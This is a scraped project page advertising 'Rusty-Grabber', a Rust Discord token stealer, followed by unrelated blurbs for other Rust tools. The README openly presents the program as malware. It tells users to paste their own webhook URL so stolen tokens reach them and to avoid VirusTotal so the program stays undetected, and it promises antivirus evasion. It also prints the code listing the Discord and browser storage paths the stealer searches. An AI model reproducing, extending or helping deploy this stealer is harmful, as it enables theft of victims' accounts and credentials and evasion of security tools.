🚀 Blazing fast and Powerful Discord Token Grabber, no popo made with python

Overview

Rusty-Grabber 🚀

  • a blazing fast Discord Token Grabber, no popo made with python

Fastest Token Grabber ever :

Rusty-Grabber> time ./target/release/grabber
0.00user 0.00system 0:00.72elapsed 0%CPU (0avgtext+0avgdata 5396maxresident)k
0inputs+0outputs (1419major+0minor)pagefaults 0swaps
- Multithreading (Rayon, Tokio) -> Threading each path's and requests
- Parallelism (Rayon, jwalk) -> All files read simultaneously, jwalk to go to each entries fastly
- Mutex, Arc -> thread safety

Fill your Webhook in utils.rs :

./src/global/utils.rs:4 in the WEBHOOK_URL const.

virus total report with 0 Obfuscation, Xoring or AV Evasion

Alt text

Avoid using virus total when scanning the malware.

They will blacklist the program

Use kleenscan instead (Anonymous reporting)

I will maintain the code updated and more optimised

- Work with new discord token's encryption 2023
- Grab all token's possible
- Check each token's
- Soon DiscordProtector bypasser and AV evasion maybe paid

Browser's & Discord Client handle :

lazy_static! {
    pub static ref PATHS: HashMap<&'static str, String> = {
        let map = HashMap::from([
            ("Discord", format!("{}\\discord\\Local Storage\\leveldb\\", ROAMING)),
            ("Discord Canary", format!("{}\\discordcanary\\Local Storage\\leveldb\\", ROAMING)),
            ("Lightcord", format!("{}\\Lightcord\\Local Storage\\leveldb\\", ROAMING)),
            ("Discord PTB", format!("{}\\discordptb\\Local Storage\\leveldb\\", ROAMING)),
            ("Opera", format!("{}\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\", ROAMING)),
            ("Opera GX", format!("{}\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\", ROAMING)),
            ("Amigo", format!("{}\\Amigo\\User Data\\Local Storage\\leveldb\\", APPDATA)),
            ("Torch", format!("{}\\Torch\\User Data\\Local Storage\\leveldb\\", APPDATA)),
            ("Kometa", format!("{}\\Kometa\\User Data\\Local Storage\\leveldb\\", APPDATA)),
            ("Orbitum", format!("{}\\Orbitum\\User Data\\Local Storage\\leveldb\\", APPDATA)),
            ("CentBrowser", format!("{}\\CentBrowser\\User Data\\Local Storage\\leveldb\\", APPDATA)),
            ("7Star", format!("{}\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\", APPDATA)),
            ("Sputnik", format!("{}\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\", APPDATA)),
            ("Vivaldi", format!("{}\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\", APPDATA)),
            ("Chrome SxS", format!("{}\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\", APPDATA)),
            ("Firefox", format!("{}\\Mozilla\\Firefox\\Profiles\\", ROAMING)),
            ("Chrome", format!("{}\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\", APPDATA)),
            ("Chrome1", format!("{}\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\", APPDATA)),
            ("Chrome2", format!("{}\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\", APPDATA)),
            ("Chrome3", format!("{}\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\", APPDATA)),
            ("Chrome4", format!("{}\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\", APPDATA)),
            ("Chrome5", format!("{}\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\", APPDATA)),
            ("Epic Privacy Browser", format!("{}\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\", APPDATA)),
            ("Microsoft Edge", format!("{}\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\", APPDATA)),
            ("Uran", format!("{}\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\", APPDATA)),
            ("Yandex", format!("{}\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\", APPDATA)),
            ("Brave", format!("{}\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\", APPDATA)),
            ("Iridium", format!("{}\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\", APPDATA)),
        ]);
        map
    };
}
You might also like...
⚡ A Blazing fast alternative to the stock windows folder delete function!
⚡ A Blazing fast alternative to the stock windows folder delete function!

Turbo Delete A blazing fast alternative to the default Windows delete. Turbodelete is a blazing fast alternative to the default Windows delete functio

Starkli (/ˈstɑːrklaɪ/), a ⚡ blazing ⚡ fast ⚡ CLI tool for StarkNet powered by 🦀 starknet-rs 🦀

starkli Starkli (/ˈstɑːrklaɪ/), a ⚡ blazing ⚡ fast ⚡ CLI tool for StarkNet powered by 🦀 starknet-rs 🦀 Installation The package will be published to

⚡ Blazing ⚡ fast ⚡ compiler for Cairo, written in 🦀 Rust 🦀

Cairo 1.0 🐺 ⚡ Blazing ⚡ fast ⚡ compiler for Cairo, written in 🦀 Rust 🦀 Report a Bug - Request a Feature - Ask a Question Getting Started Prerequisi

⚡️Blazing Fast⚡️ CLI tool to get Bible verses with Rust 🦀

bible.rs This is a simple command line tool that accesses bible-api.com to print Bible verses in the terminal Installation brew install wzid/tap/bible

Blazing fast tool to benchmark Starknet sequencers 🦀

Gomu Gomu no Gatling Blazing fast tool to benchmark Starknet sequencers 🦀 . Installation From source git clone https://github.com/keep-starknet-stran

⚡️ Blazing fast terminal file manager written in Rust, based on async I/O.

Yazi - ⚡️ Blazing Fast Terminal File Manager Yazi ("duck" in Chinese) is a terminal file manager written in Rust, based on non-blocking async I/O. It

Minimal, blazing fast Node.js script runner

nrr Minimal, blazing fast Node.js script runner. Why? nrr initializes and resolves scripts way faster than package managers. It achieves this by provi

Rust Imaging Library's Python binding: A performant and high-level image processing library for Python written in Rust

ril-py Rust Imaging Library for Python: Python bindings for ril, a performant and high-level image processing library written in Rust. What's this? Th

Tool for audit and reclaim of delegated SPL Token accounts

Usage Install prerequisites System development libraries sudo apt install libssl-dev libudev-dev pkg-config gcc Rust curl --proto '=https' --tlsv1.2

Owner
bishop
computer science student
bishop
⚡ Blazing fast async/await HTTP client for Python written on Rust using reqwests

Reqsnaked Reqsnaked is a blazing fast async/await HTTP client for Python written on Rust using reqwests. Works 15% faster than aiohttp on average RAII

Yan Kurbatov 8 Mar 2, 2023
pyrevm Blazing-fast Python bindings to revm

pyrevm Blazing-fast Python bindings to revm Quickstart make install make test Example Usage Here we show how you can fork from Ethereum mainnet and s

Georgios Konstantopoulos 97 Apr 14, 2023
☄🌌️ The minimal, blazing-fast, and infinitely customizable prompt for any shell

☄??️ The minimal, blazing-fast, and infinitely customizable prompt for any shell

Starship Command 31.6k Dec 30, 2022
A blazing fast and easy to use TRPC-like server for Rust.

rspc ?? Work in progress ?? A blazing fast and easy to use TRPC-like server for Rust. Website Example You define a trpc router and attach resolvers to

Oscar Beaumont 344 Dec 31, 2022
Minimal and blazing-fast file server. For real, this time.

Zy Minimal and blazing-fast file server. For real, this time. Features Single Page Application support Partial responses (Range support) Cross-Origin

Miraculous Owonubi 17 Dec 18, 2022
Blazing-fast and yet Sleuth cameraman to www* 😎⚡✨

Haylxon ?? ?? SHOOT BEFORE THE BLINK || Haylxon, A tool embodying the K1SS philosophy that allows you to take screenshots of webpages/URLs at lightnin

Nabeen Tiwaree 78 Apr 10, 2023
A fast, powerful, and safe interpreter written in rust!

Kraber A fast, powerful, and safe programming language written in rust! About It packs a punch like the Kraber .50-Cal. Kraber is designed to be minim

Int Fract 3 Mar 24, 2024
PyO3 bindings and Python interface to skani, a method for fast fast genomic identity calculation using sparse chaining.

?? ⛓️ ?? Pyskani PyO3 bindings and Python interface to skani, a method for fast fast genomic identity calculation using sparse chaining. ??️ Overview

Martin Larralde 13 Mar 21, 2023
zoxide is a blazing fast replacement for your cd command

zoxide A smarter cd command for your terminal zoxide is a blazing fast replacement for your cd command, inspired by z and z.lua. It keeps track of the

Ajeet D'Souza 8.7k Dec 31, 2022
A blazing fast command line license generator for your open source projects written in Rust🚀

Overview This is a blazing fast ⚡ , command line license generator for your open source projects written in Rust. I know that GitHub

Shoubhit Dash 43 Dec 30, 2022